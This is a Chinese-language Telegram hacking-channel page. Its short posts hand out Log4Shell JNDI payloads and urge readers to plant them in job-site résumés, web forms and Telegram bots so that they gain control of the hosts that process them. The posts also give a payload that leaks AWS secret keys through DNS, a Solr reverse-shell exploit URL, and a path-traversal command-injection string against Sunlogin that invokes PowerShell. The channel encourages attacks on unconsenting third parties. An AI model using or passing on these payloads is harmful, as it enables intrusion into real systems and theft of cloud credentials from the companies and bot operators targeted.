TG Telegram Group Link
Channel: 黑客早知道
Back to Bottom
大家把log4j2的串放在各大招聘网站的简历中试试,你可能会上线一堆主机(爬你简历的公司)😢
教大家怎么玩吧,很简单:http://www.dnslog.cn/ 点击getsubdomain,一键生成域名,比如是abc.dnslog.cn

将这个域名放进payload,比如:

${${::-j}ndi:rmi://abc.dnslog.cn/ass}

${jndi:rmi://abc.dnslog.cn}

${${lower:jndi}:${lower:rmi}://abc.dnslog.cn/poc}

在各大网站、系统能输入的地方都发、写入这些串,然后在dnslog页面刷新等结果就好了
大家给各tg bot发这些payload,也有可能拿下他们哦😂😂😂 刚试了几个知名bot都成功了
log4j礼物🎁继续派送:${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.你的域名.com} ,大家放开脑洞,比如还有哪些可爱的环境变量呢?
#log4j 礼物: apache solr EXP

/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json
CVE-2021-44832 : 骂谁呢
rockyou.txt
😂
😂
向日葵🌻就是个命令拼接漏洞
/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+" + cmd)
来了来了 RCE他又来了
那个exe带vmp壳的poc, 是木马😅
spring core rce是真的,class随意控制,玩法非常多
Chatgpt Puls申请教程
HTML Embed Code:
2024/03/28 11:45:13
Back to Top